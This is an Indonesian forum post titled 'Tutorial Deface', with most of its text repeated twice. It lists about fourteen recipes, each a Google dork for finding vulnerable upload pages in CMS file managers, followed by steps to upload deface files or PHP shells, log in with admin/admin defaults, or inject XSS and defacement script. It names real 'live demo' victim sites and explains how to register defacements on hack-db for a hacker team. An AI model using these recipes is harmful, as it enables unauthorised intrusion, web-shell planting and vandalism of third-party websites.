- Beranda
- Komunitas
- Entertainment
- The Lounge
Tutorial Deface
TS
anonaltus
Tutorial Deface
1. phUploader exploit
dork : "Powered by phUploader intext:txt" < bisa diganti sesuai kebutuhan
upload your own file : txt
akses file : akan ada preview setelah upload
live demo : http://www.bizarremart.com/pix/pix.php
2. Moxiecode File Browser
dork : intitle:Moxiecode File browser filetype
hp
upload your own file : .html , .txt , .jpg
akses file : setelah upload , cari filemu , klik centang dan klik view di sebelah kanan
live demo : http://www.infol.com/Scripts/tiny_mc...r/frameset.php
3. Ajax File manager upload vulnerabillity
dork : inurl:ajaxfilemanager.php intitle:ajax file manager
upload your own file : .txt , .jpg [upload form : [url]http://prntscr.com/1jiwgh][/url]
akses file : arahkan kursor ke file kalian dan kalian akan lihat akses file kalian di pojok bawah [http://prntscr.com/1jiwq7]
live demo : http://www.phungvinhhung.com/app/web...ilemanager.php
4. Exploit FileChucker
dork : inurl:/cgi-bin/filechucker.cgi
intext:File Upload by Encodable
upload your own file : .html , .txt , .jpg
akses file : isi semua data , kmudian upload , setelah itu klik saja file yang sudah diupload , itu preview file kamu
live demo : http://www.middadmit.org/cgi-bin/filechucker.cgi
5. (1.Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes /WPstore/ atau intext:"You have 0($0) item in your Shopping Bag"
2. Pilih salah satu dari hasil penelusuran
3.CTRL+U Cari Expolit Yang Kaya Gini http://prntscr.com/1d34wu wp-content/themes/[Path]/style.css
4. ganti style.css dengan upload
5. nanti akan muncul form buat upload contoh : http://prntscr.com/1d355q
6. upload shell anda
7. cara memanggilnya bagaimana mas? untuk cara memanggil shellnya /wp-content/uploads/products_img/shell.php
8. tinggal hajar index.php dengan script kamu)
6. FckLinkGallery upload vulnerability
Dork : inurl:Fck/fcklinkgallery.aspx
/portals/0/inurl:tabid/176/Default.aspx
Upload your own file : .txt , .jpg
Akses file : klik file , kemudian copykan [removed]__doPostBack('ctlURL$cmdUpload','') di browser , ntar bakalan muncul tombol upload , upload filemu , dan jika ingin preview filemu tambahkan /portals/0/ , jadi http://site.com/portals/0/[yourfile].txt
live demo : http://www.iiit.org/Providers/HtmlEd...nkgallery.aspx
7. KindEditor File Upload VulnerabilityDork : inurl:examples/uploadbutton.htmlUpload your file : .html , .txt , .jpgAkses file : setelah upload akan ada URL yang muncul , copykan itu dibelakang web jadi [url=http://www.site.com/[URLdisini]live]www.site.com/[URLdisini]live[/url] demo : http://staic.qefeng.com/Kindeditor/e...oadbutton.html
8. IMCE Drupal Upload VulnerabilityDork : inurl:"/imce?dir=" intitle:"File Browser"Upload your file : .htm , .html , .txt , .jpgAkses file : klik menu upload di pojok kiri atas setelah itu untuk view file : http://www.target.com/sites/default/[yourfilename].htmllive demo : http://www.simoneye.com/imce?dir=fas...yewear/engine1
9. XSS alias Cross Site ScriptingDork : inurl:"/showcatrows.php?CategoryID="How to deface : masukan kode berikut dibelakang url target : http://tny.cz/2a6cf72c < klik link , kode ada disanaNB : Untuk yang TsuNaomi48 bisa diganti dengan nickname kalian sendiri
Live demo : http://www.ebook-gigant.com/showcatr...p?CategoryID=2
10. Exploit Shop737
Dork : "Powered by Shop737"
Upload your file : .txt , jpg
How to deface : setelah dapat web target , masukkan exploit berikut : /poto/upload.php , jadi URL menjadi www.site.com/poto/upload.php , jika disuruh memasukkan username dan password , masukkan username : admin dan password : admin , setelah itu pilih kategori [ [url]http://prntscr.com/1niiku][/url] dan terakhir klik upload
Akses File : [url=http://www.site.com/poto/[kategori]www.site.com/poto/[kategori[/url] yang kamu pilih tadi]/[nama filemu].txt
Live demo : www.hunnyhostel.com/poto/index.php
11. CKFinder Upload Vulnerabillity
Dork : inurl:CKfinder/ckfinder.html
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol upload di pojok kiri atas , kemudian upload file anda
Akses file : klik kanan pada file anda dan klik "View" , itulah akses file anda
Live Demo : http://famiana-resort.com/public/rep.../ckfinder.html
12. Asset Manager Upload Vulnerability
Dork : "assetmanager/assetmanager.php" intitle:asset manager
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol choose file kemudian pilih file deface kamu dan klik tombol upload , jika berhasil akan ada preview disebelah kiri
NB : Jika tidak ada preview file , ubah filter ke all files [http://s14.postimg.org/5yl6ejs35/ssssssssssssssss.jpg]
Akses file : klik pada file anda , akan ada hasil view dari file anda tadi [http://s14.postimg.org/a8zua4x69/uuuu.jpg] dan copykan url itu ke adress bar anda , sehingga menjadi site.com/[url]
Live demo : http://www.andyrouse.co.uk/assetmana...setmanager.php
13 . Deface Dengan Joomla com_collecter shell upload My best Exploit ^_^
# Download: http://www.steevo.fr/en/download
# dork: [inurl:index.php?option=com_collector]
# masukan exploit ini index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
# Jadi Seperti ini >> : http://www.sitetarget.com/index.php?...folder=&type=1 :v
# langsung upload shellnya di bawah kanan
# Kalo nyari shell yg udah di upload gmn ? : http://www.sitetargetganteng.com/shell.php
14. Com_Guestbook -_-
Iseng-iseng nyoba2 -_-
Ini cuma bisa add post aja bro :3
Tapi setidaknya ntar link post bisa disubmit :v :v :v
Dork :
inurl:"index.php?option=com_guestbook"
Nah, terserah pilih web yg mana
ntar isi buku tamu
ada :
Nama
Email
Pesan (isiin ama script depes aja :v )
dah gitu doank sih
xixixi newbie berbagi
Jangan bully ane yak >.< nitip nama : Penjagaayen a.k.a Another
jika ada yang mau menambahkan silahkan disunting sendiri ^^
bagi yang mau submit di Hack-mirror atau Hack-db tutorialnya :
1. masuk ke situs hack-db.com atau hack-mirror.com
2. klik notify attacks
3.notifier = nickname kalian (tanpa simbol) ,
Team : JKT48 CYBER TEAM ,
Url : url deface kalian , dan terakhir ketik captcha securitynya
Added to Our DB. = Deface kalian berhasil masuk dan akan berada di Onhold
Already Hacked this year. = Sudah pernah di deface sesorang
Invalid subdomain = subdomain tidak diperbolehkan , hanya .gov dan .ac yang diperbolehkan
Invalid directory in Ban List = deface kalian dalam banned , karena ada hal yang tidak diperbolehkan (misal : hack db memblokir "~" karena tidak boleh pakai fake root)
sekian dan selamat belajar
dork : "Powered by phUploader intext:txt" < bisa diganti sesuai kebutuhan
upload your own file : txt
akses file : akan ada preview setelah upload
live demo : http://www.bizarremart.com/pix/pix.php
2. Moxiecode File Browser
dork : intitle:Moxiecode File browser filetype
hp upload your own file : .html , .txt , .jpg
akses file : setelah upload , cari filemu , klik centang dan klik view di sebelah kanan
live demo : http://www.infol.com/Scripts/tiny_mc...r/frameset.php
3. Ajax File manager upload vulnerabillity
dork : inurl:ajaxfilemanager.php intitle:ajax file manager
upload your own file : .txt , .jpg [upload form : [url]http://prntscr.com/1jiwgh][/url]
akses file : arahkan kursor ke file kalian dan kalian akan lihat akses file kalian di pojok bawah [http://prntscr.com/1jiwq7]
live demo : http://www.phungvinhhung.com/app/web...ilemanager.php
4. Exploit FileChucker
dork : inurl:/cgi-bin/filechucker.cgi
intext:File Upload by Encodable
upload your own file : .html , .txt , .jpg
akses file : isi semua data , kmudian upload , setelah itu klik saja file yang sudah diupload , itu preview file kamu
live demo : http://www.middadmit.org/cgi-bin/filechucker.cgi
5. (1.Masukkan dork ini ke kotak pencarian google inurl:/wp-content/themes /WPstore/ atau intext:"You have 0($0) item in your Shopping Bag"
2. Pilih salah satu dari hasil penelusuran
3.CTRL+U Cari Expolit Yang Kaya Gini http://prntscr.com/1d34wu wp-content/themes/[Path]/style.css
4. ganti style.css dengan upload
5. nanti akan muncul form buat upload contoh : http://prntscr.com/1d355q
6. upload shell anda
7. cara memanggilnya bagaimana mas? untuk cara memanggil shellnya /wp-content/uploads/products_img/shell.php
8. tinggal hajar index.php dengan script kamu)
6. FckLinkGallery upload vulnerability
Dork : inurl:Fck/fcklinkgallery.aspx
/portals/0/inurl:tabid/176/Default.aspx
Upload your own file : .txt , .jpg
Akses file : klik file , kemudian copykan [removed]__doPostBack('ctlURL$cmdUpload','') di browser , ntar bakalan muncul tombol upload , upload filemu , dan jika ingin preview filemu tambahkan /portals/0/ , jadi http://site.com/portals/0/[yourfile].txt
live demo : http://www.iiit.org/Providers/HtmlEd...nkgallery.aspx
7. KindEditor File Upload VulnerabilityDork : inurl:examples/uploadbutton.htmlUpload your file : .html , .txt , .jpgAkses file : setelah upload akan ada URL yang muncul , copykan itu dibelakang web jadi [url=http://www.site.com/[URLdisini]live]www.site.com/[URLdisini]live[/url] demo : http://staic.qefeng.com/Kindeditor/e...oadbutton.html
8. IMCE Drupal Upload VulnerabilityDork : inurl:"/imce?dir=" intitle:"File Browser"Upload your file : .htm , .html , .txt , .jpgAkses file : klik menu upload di pojok kiri atas setelah itu untuk view file : http://www.target.com/sites/default/[yourfilename].htmllive demo : http://www.simoneye.com/imce?dir=fas...yewear/engine1
9. XSS alias Cross Site ScriptingDork : inurl:"/showcatrows.php?CategoryID="How to deface : masukan kode berikut dibelakang url target : http://tny.cz/2a6cf72c < klik link , kode ada disanaNB : Untuk yang TsuNaomi48 bisa diganti dengan nickname kalian sendiri
Live demo : http://www.ebook-gigant.com/showcatr...p?CategoryID=2
10. Exploit Shop737
Dork : "Powered by Shop737"
Upload your file : .txt , jpg
How to deface : setelah dapat web target , masukkan exploit berikut : /poto/upload.php , jadi URL menjadi www.site.com/poto/upload.php , jika disuruh memasukkan username dan password , masukkan username : admin dan password : admin , setelah itu pilih kategori [ [url]http://prntscr.com/1niiku][/url] dan terakhir klik upload
Akses File : [url=http://www.site.com/poto/[kategori]www.site.com/poto/[kategori[/url] yang kamu pilih tadi]/[nama filemu].txt
Live demo : www.hunnyhostel.com/poto/index.php
11. CKFinder Upload Vulnerabillity
Dork : inurl:CKfinder/ckfinder.html
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol upload di pojok kiri atas , kemudian upload file anda
Akses file : klik kanan pada file anda dan klik "View" , itulah akses file anda
Live Demo : http://famiana-resort.com/public/rep.../ckfinder.html
12. Asset Manager Upload Vulnerability
Dork : "assetmanager/assetmanager.php" intitle:asset manager
Upload your file : .txt , .jpg
How to deface : setelah dapat web target , klik tombol choose file kemudian pilih file deface kamu dan klik tombol upload , jika berhasil akan ada preview disebelah kiri
NB : Jika tidak ada preview file , ubah filter ke all files [http://s14.postimg.org/5yl6ejs35/ssssssssssssssss.jpg]
Akses file : klik pada file anda , akan ada hasil view dari file anda tadi [http://s14.postimg.org/a8zua4x69/uuuu.jpg] dan copykan url itu ke adress bar anda , sehingga menjadi site.com/[url]
Live demo : http://www.andyrouse.co.uk/assetmana...setmanager.php
13 . Deface Dengan Joomla com_collecter shell upload My best Exploit ^_^
# Download: http://www.steevo.fr/en/download
# dork: [inurl:index.php?option=com_collector]
# masukan exploit ini index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1
# Jadi Seperti ini >> : http://www.sitetarget.com/index.php?...folder=&type=1 :v
# langsung upload shellnya di bawah kanan
# Kalo nyari shell yg udah di upload gmn ? : http://www.sitetargetganteng.com/shell.php
14. Com_Guestbook -_-
Iseng-iseng nyoba2 -_-
Ini cuma bisa add post aja bro :3
Tapi setidaknya ntar link post bisa disubmit :v :v :v
Dork :
inurl:"index.php?option=com_guestbook"
Nah, terserah pilih web yg mana
ntar isi buku tamu
ada :
Nama
Pesan (isiin ama script depes aja :v )
dah gitu doank sih
xixixi newbie berbagi
Jangan bully ane yak >.< nitip nama : Penjagaayen a.k.a Another
jika ada yang mau menambahkan silahkan disunting sendiri ^^
bagi yang mau submit di Hack-mirror atau Hack-db tutorialnya :
1. masuk ke situs hack-db.com atau hack-mirror.com
2. klik notify attacks
3.notifier = nickname kalian (tanpa simbol) ,
Team : JKT48 CYBER TEAM ,
Url : url deface kalian , dan terakhir ketik captcha securitynya
Added to Our DB. = Deface kalian berhasil masuk dan akan berada di Onhold
Already Hacked this year. = Sudah pernah di deface sesorang
Invalid subdomain = subdomain tidak diperbolehkan , hanya .gov dan .ac yang diperbolehkan
Invalid directory in Ban List = deface kalian dalam banned , karena ada hal yang tidak diperbolehkan (misal : hack db memblokir "~" karena tidak boleh pakai fake root)
sekian dan selamat belajar
0
8K
16
Guest
Tulis komentar menarik atau mention replykgpt untuk ngobrol seru
Urutan
Terbaru
Terlama
Guest
Tulis komentar menarik atau mention replykgpt untuk ngobrol seru
Komunitas Pilihan